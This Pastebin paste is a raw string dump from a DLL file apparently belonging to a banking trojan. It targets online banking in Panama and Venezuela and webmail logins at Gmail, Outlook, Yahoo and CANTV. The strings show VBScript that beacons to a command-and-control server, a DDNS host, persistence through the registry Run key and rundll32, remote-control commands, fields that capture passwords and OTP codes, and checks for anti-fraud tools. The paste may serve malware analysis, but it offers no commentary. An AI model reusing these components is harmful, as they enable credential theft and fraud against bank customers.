Advertisement
Matthewm

_mjllin.dll

Feb 23rd, 2016
1,210
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.39 KB | None | 0 0
  1. Name: _mjllin.dll
  2. SHA256: 047F19C8E7A07449BB330BF3EC35E158329F127A2E52161063A27ED8ACE5D7D3
  3.  
  4. NlUiPHBR3XAzabu51vcWqZMghSstk2L87yGYIjTFC69D4OVo0eJnExdmrKpfwQ
  5. start.cfg
  6. configz.zip
  7. open
  8. Uconfini.bat
  9. Uconfini.txt
  10. capivara.exe
  11. close1
  12. https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/pages/index.jsp
  13. [Click]
  14. bckimg\BP\
  15. foto
  16. .jpg
  17. loginP.jsp
  18. loginC.jsp
  19. 200.98.145.213
  20. 192.168.1.3
  21. is-gmail
  22. gmail
  23. Email
  24. <|>
  25. MSScriptControl.ScriptControl
  26. VBScript
  27. host = "
  28. port = "
  29. cmd="
  30. information="
  31. set httpobj = createobject("msxml2.xmlhttp")
  32. function post (cmd ,param)
  33. on error resume next
  34. post = param
  35. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  36. httpobj.setrequestheader "user-agent:",information
  37. httpobj.send param
  38. post = httpobj.responsetext
  39. end function
  40. response = ""
  41. response = post ("is-gmail","")
  42. vai fechar
  43. Off-line
  44. Passwd
  45. usuario:
  46. Senha:
  47. c:\gmail.com.txt
  48. c:\outlookUrl.txt
  49. accounts/Logout
  50. is-outlook
  51. outlook
  52. response = post ("is-outlook","")
  53. offline2
  54. loginfmt
  55. c:\outllok.com.txt
  56. SP=
  57. login.live.com/logout.srf?
  58. offline1
  59. form_BO :
  60. IB.cfg
  61. dd_mm_yyyy
  62. hh_mm_ss
  63. _BO.zip
  64. /HOME/infos/bo/
  65. bckimg\bo\
  66. _BO
  67. .zip
  68. bckimg\ATIVO\
  69. vamo nessa
  70. _ATIVO
  71. teste
  72. /HOME/infos/ATIVO/
  73. temp_bo.cfg
  74. ATIVO
  75. bckimg
  76. \ATIVO
  77. Activo en L
  78. nea
  79. Google Chrome
  80. Chrome_RenderWidgetHostHWND
  81. PagoElectr
  82. nico - Google Chrome
  83. Icon_gc
  84. Icon_gc.ico
  85. -------------------------------------
  86. Browser :
  87. URL :
  88. Data/Hora :
  89. trustee Instalado:
  90. - Google Chrome
  91. https://activoenlinea.bancoactivo.com/naturales/usuarios/login/J
  92. Activo en L
  93. nea - Google Chrome
  94. Internet Explorer
  95. Icon_ie
  96. Icon_ie.ico
  97. - Internet Explorer
  98. Activo en L
  99. nea - Internet Explorer
  100. Mozilla Firefox
  101. Icon_ff
  102. Icon_ff.ico
  103. - Mozilla Firefox
  104. Activo en L
  105. nea - Mozilla Firefox
  106. o conectou :
  107. Erro ao fazer Upload:
  108. EMPRESA
  109. env_bo_emp.zip
  110. .win
  111. FISICA
  112. env_bo_fis.zip
  113. https://www.banesconline.com/mantis/Website/Login.aspx
  114. Banesco Online - Google Chrome
  115. \bo
  116. BanescOnline
  117. {CTRL+V}
  118. Banesco Online
  119. Banesco Online - Internet Explorer
  120. Banesco Online - Mozilla Firefox
  121. foto_TEXTO_
  122. dd-mm-yy-hh
  123. .txt
  124. Senha:
  125. S.Atual:
  126. N.senha:
  127. conf. N.senha:
  128. foto_infopc.txt
  129. _BOD
  130. bckimg\BOD\
  131. env_BOD_emp.zip
  132. env_BOD_fis.zip
  133. /HOME/infos/BOD/
  134. BOD
  135. \BOD
  136. Banco Occidental de Descuento
  137. ativou
  138. fechou
  139. _EXT
  140. Banca Virtual BODInternet
  141. https://bod.bodmillenium.com
  142. https://bod.bodmillenium.com/e2f/e03/e2fvpini.html
  143. Banca Virtual BODInternet. Banco Occidental de Descuento, Banco Universal, C.A. - Google Chrome
  144. Banesco Panam
  145. env_bp.zip
  146. block_BP.win
  147. c:\img\links.txt
  148. _bp
  149. _BP2.zip
  150. /HOME/infos/bp/
  151. \bp
  152. bloqueado
  153. Banesco Panam
  154. , Sistema de Banca por Internet
  155. pegou
  156. Banesco Panam
  157. , Sistema de Banca por Internet - Google Chrome
  158. Internet Explorer_Server
  159. Banesco Panam
  160. , Sistema de Banca por Internet - Internet Explorer
  161. Banesco Panam
  162. , Sistema de Banca por Internet - Mozilla Firefox
  163. email\ctv\
  164. [Click<]
  165. [Click >]
  166. _CTV.zip
  167. /HOME/emails/ctv/
  168. _CTV
  169. \ctv
  170. Correo Web de CANTV
  171. Cantv.net - Te acerca el futuro
  172. internetbanking.cfg
  173. email_TEXTO_
  174. bckimg\EXT\
  175. /HOME/infos/EXT/
  176. EXT
  177. \EXT
  178. INTERNET e24
  179. https://www3.bancoexterior.com/
  180. _.__ INTERNET e24 __.. - Google Chrome
  181. _PEB.zip
  182. /HOME/infos/peb/
  183. bckimg\peb\
  184. _peb
  185. \peb
  186. PagoElectr
  187. nico
  188. https://pagoelectronico.banesco.com/lazaro/Website/login.aspx
  189. PagoElectr
  190. nico - Internet Explorer
  191. PagoElectr
  192. nico - Mozilla Firefox
  193. bckimg\gmail\
  194. env_gmail.zip
  195. block_gmail.win
  196. _gmail
  197. \gmail
  198. Restore
  199. minimizado
  200. MozillaWindowClass
  201. Chrome_WidgetWin_1
  202. http://outlook.com/
  203. https://accounts.google.com/AddSession?
  204. sacu=1&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=pt-BR&service=mail
  205. https://accounts.google.com/AddSession
  206. ?sacu=1&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=pt-BR&service=mail
  207. https://accounts.google.com/AddSession?sacu=
  208. 1&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=pt-BR&service=mail
  209. bckimg\look\
  210. env_look.zip
  211. block_look.win
  212. _look
  213. \look
  214. Iniciar sesi
  215. Registrarse
  216. Enter
  217. Sign In
  218. Entrar
  219. env_MCTBP.zip
  220. block_MCTBP.win
  221. _MCTBP
  222. _MCTBP2.zip
  223. https://melp.mercantilbankpanama.com/DIBS_MERCANTIL_PANAMA/pages/loginC.jsp
  224. Bienvenidos a Mercantil Bank (Panam
  225. _MULTIB
  226. Multibank
  227. https://multibank.com.pa/
  228. Multibank - Google Chrome
  229. Multibank - Internet Explorer
  230. Multibank - Mozilla Firefox
  231. IEFrame
  232. Frame Tab
  233. TabWindowClass
  234. Shell DocObject View
  235. _Yahoo.zip
  236. /HOME/emails/Yahoo/
  237. email\Yahoo\
  238. _Yahoo
  239. \Yahoo
  240. Iniciar sesi
  241. n en Yahoo
  242. Sign in to Yahoo
  243. Yahoo - Inicio de sesi
  244. https://es.mail.yahoo.com/
  245. .cfg
  246. dd/mm/yyyy
  247. is-ativo
  248. not
  249. response = post ("is-ativo","")
  250. foto_teclado.jpg
  251. NAO
  252. c:\textosdoativo.txt
  253. data[Usuario][nroRif]
  254. data[Usuario][login]
  255. data[Usuario][contrasena]
  256. El correo electr
  257. nico no puede estar en blanco
  258. La Contrase
  259. a no puede estar en blanco
  260. El correo electr
  261. nico no coinciden. Intente otra vez
  262. Lo sentimos, la contrase
  263. a ingresada no es correcta.
  264. ====================================
  265. User.......:
  266. pass.......:
  267. Tipo.......:
  268. S.teclado..:
  269. Email......:
  270. S.Email....:
  271. email2.....:
  272. S.Mail_2...:
  273. c:\dados.txt
  274. Por su seguridad, ingrese los datos solicitados y presione "Continuar"
  275. Validacion de Correo Eletr
  276. nico
  277. is-banesco
  278. banesco
  279. response = post ("is-bodinternet","")
  280. https://www.banesconline.com/MANTIS/WEBSITE/administrarclaves/cambiarcoe.aspx
  281. user001
  282. pws001
  283. 123456
  284. 654321
  285. is-testando
  286. imgVal.y=
  287. /imagenesinhouse/imagenesinhouse.aspx
  288. Su clave de Operaciones Especiales ha sido cambiada satisfactoriamente
  289. SIM
  290. Ud. no posee un producto financiero que le permita realizar esta operaci
  291. Cambio de Clave Operaciones Especiales
  292. c:\img\textos.txt
  293. administrarclaves/cambiarcoe.aspx
  294. /salir.aspx
  295. txtUsuario
  296. txtClave
  297. txtClaveActual
  298. txtNuevaClave
  299. txtConfNuevaClave
  300. is-print
  301. Default.aspx
  302. https://www.banesconline.com/MANTIS/WEBSITE/imagenesinhouse/imagenesinhouse.aspx
  303. /administrarclaves/cambiarcoe.aspx
  304. Login.aspx
  305. is-bodinternet
  306. bodinternet
  307. https://bod.bodmillenium.com/E2F-BIN/E2VCNR01.PGM
  308. CA_USUARI
  309. CA_CONTRA
  310. CA_TIPPER
  311. CA_CUSCUI
  312. /e2f-bin/E2FCONECV1.PGM
  313. cai pra dentro
  314. sendtoken
  315. Lo sentimos, el c
  316. digo OTP ingresado no es correcto.
  317. sendfinalizar
  318. Su Contrase
  319. a Operacional ha sido cambiada satisfactoriamente
  320. sendativartoken
  321. tarjeta
  322. ON-LINE
  323. OF-LINE
  324. Cambio de Contrase
  325. a Operacional
  326. is-panama
  327. panama
  328. response = post ("is-panama","")
  329. <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 3.2 FINAL/EN">
  330. <HTML>
  331. <SCRIPT Language="Javascript">
  332. function go(url, tg) {
  333. var frm = document.forms[0];
  334. frm.ServletName.value = url;
  335. frm.target = tg;
  336. frm.submit();
  337. }
  338. </SCRIPT>
  339. <BODY onload= "javascript:go(
  340. https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/
  341. pages/body_wait.jsp?ServletName=https://ebanking.banesco.com.pa/
  342. DIBS_BANESCO_PANAMA/servlet/com.datapro.dibs.servlets.JSBlockCard?
  343. PB=1&OPT=6-8
  344. body
  345. )">
  346. <form METHOD=POST ACTION="https://ebanking.banesco.com.pa/
  347. DIBS_BANESCO_PANAMA/pages/body_wait.jsp" TARGET="body">
  348. <INPUT TYPE=HIDDEN NAME="ServletName" VALUE="">
  349. <input type=hidden name="ACTIVEOPT" value="">
  350. </form>
  351. </BODY>
  352. </HTML>
  353. UserId
  354. UserPass
  355. https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/pages/index.jsp
  356. https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/servlet/
  357. com.datapro.dibs.servlets.JSLogOut?UTYPE=2
  358. login_logout.jsp
  359. vc foi desconectado
  360. S.Opera....:
  361. N.Opera....:
  362. N.conf.....:
  363. Vld.CD.....:
  364. Email.......:
  365. senha1.......:
  366. senha2.......:
  367. Tarjeta.......:
  368. TOKEN
  369. La Contrase
  370. a nueva no puede estar en blanco
  371. La Confirmac
  372. on no puede estar en blanco
  373. La Contrase
  374. a y la confirmac
  375. on no son iguales, por favor verifiquelo
  376. La Contrase
  377. a Original y la contrase
  378. a Nueva NO pueden ser iguales, por favor verifiquelo
  379. El C
  380. digo OTP no puede estar en blanco
  381. Lo sentimos, el c
  382. digo A ingresado no es correcto.
  383. ----
  384. &OPASSWORD
  385. &NPASSWORD
  386. &CPASSWORD
  387. c:\img\panama.txt
  388. Su Contrase
  389. a Operacional ha sido
  390. cambiada satisfactoriamente
  391. ABERTO
  392. &UserId
  393. &UserPass
  394. DIBS_BANESCO_PANAMA/pages/loginP.jsp
  395. DIBS_BANESCO_PANAMA/pages/menu_ver_top.jsp
  396. DIBS_BANESCO_PANAMA/pages/menu_ver_options.jsp
  397. https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/pages/body_opass_change.jsp
  398. https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/pages/body_alarm_accounts_list.jsp
  399. /pages/body_alarm_accounts_list.jsp
  400. EmailAlertas
  401. pages/body_ccardblock.jsp
  402. DEBCARDNUM
  403. ju-panama
  404. response = post ("ju-panama","")
  405. BPJ
  406. &UserEntity
  407. DIBS_BANESCO_PANAMA/pages/loginC.jsp
  408. is-exterior
  409. exterior
  410. response = post ("is-exterior","")
  411. https://nexo.bancoexterior.com/internetbanking/
  412. temp_EXT.cfg
  413. txtgrupo
  414. txtLogin
  415. txtpassword
  416. Usuarios/intro.asp
  417. WinHttp.WinHttpRequest.5.1
  418. POST
  419. http://
  420. User-Agent
  421. is-ready
  422. El C
  423. digo A no puede estar en blanco
  424. is-multibank
  425. usuario
  426. clave
  427. internet/login2.do
  428. internet/consulta/consolidado.jsp
  429. /lazaro/WebSite/Default.aspx
  430. ctl00_cp_frmAplicacion
  431. input
  432. http://www.google.com.br
  433. GET
  434. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
  435. is-avisos
  436. avisos
  437. set fs = CreateObject("Scripting.FileSystemObject")
  438. Set ts = fs.CreateTextFile("c:\bundadecachorro.txt", True, False)
  439. ts.Write
  440. ts.close
  441. Scripting.Encoder
  442. .vbs
  443. set shellobj = createobject("wscript.shell")
  444. startup = shellobj.specialfolders ("startup") & "\"
  445. pcname = shellobj.expandenvironmentstrings("%computername%") & "_"
  446. username = shellobj.expandenvironmentstrings("%username%")
  447. startup
  448. pcname
  449. username
  450. Set objShell = CreateObject("WScript.Shell")
  451. set filesystemobj = createobject("scripting.filesystemobject")
  452. rundll = "PowerShell Start-Process rundll32.exe " &
  453. & chr(44) & "dlgProc" & chr(34)
  454. if filesystemobj.fileexists (
  455. ) then
  456. objShell.run(rundll),0
  457. End If
  458. .vbe
  459. configs_pc.yxz
  460. True
  461. connex.win
  462. NEWPRINT
  463. MOUSE
  464. novoteclado
  465. PASTE
  466. BACKSPACE
  467. TAB
  468. VK_DOWN
  469. VK_UP
  470. VK_DELETE
  471. VK_SPACE
  472. VK_ESCAPE
  473. <|Drivers|>
  474. <<|Drivers|>>
  475. <|FileManager|>
  476. <<|FileManager|>>
  477. TESTAPASTAS
  478. TESTAFILES
  479. <|DownloadFile|>
  480. <<|
  481. FAZDOWNLOAD
  482. <|UploadFile|>
  483. SUCESSOUPLOAD
  484. ATIVARNAVEGADOR
  485. NAVEGADORCLOSE
  486. <|AbrirFile|>
  487. <|DeleteFile|>
  488. LISTARPROCESS
  489. ABREPROCESS
  490. frm_navprinc
  491. FECHARPROCESS
  492. ESCONDERROCESS
  493. AJUSTARPROCESS
  494. MAXIMIZARPROCESS
  495. EXECUTARPROCESS
  496. DOWNBOFISICA
  497. Wscript.Shell
  498. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
  499. rundll32.exe "
  500. ,dlgProc
  501. REG_SZ
  502. GETPROCESS
  503. PRINT
  504. <|INFO|>
  505. ulogs_0015.cfg
  506. http://bit.ly/1aOYgU7
  507. Trusteer
  508. <|BOFUPLOADFILE|>
  509. ameliadantas123.ddns.net
  510. <|BOUPLOADFILE|>
  511. <|BPUPLOADFILE|>
  512. lybits.cfg
  513. Mensagem da p
  514. gina da web
  515. Progman
  516. .dll
  517. 1234
  518. 8194
  519. https://bitly.com/1TzKPr6
  520. RapportService.exe
  521. form1 :
  522. Socket Error
  523. www.google.com.br
  524. /internetbanking/pop_valphishing.jsp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement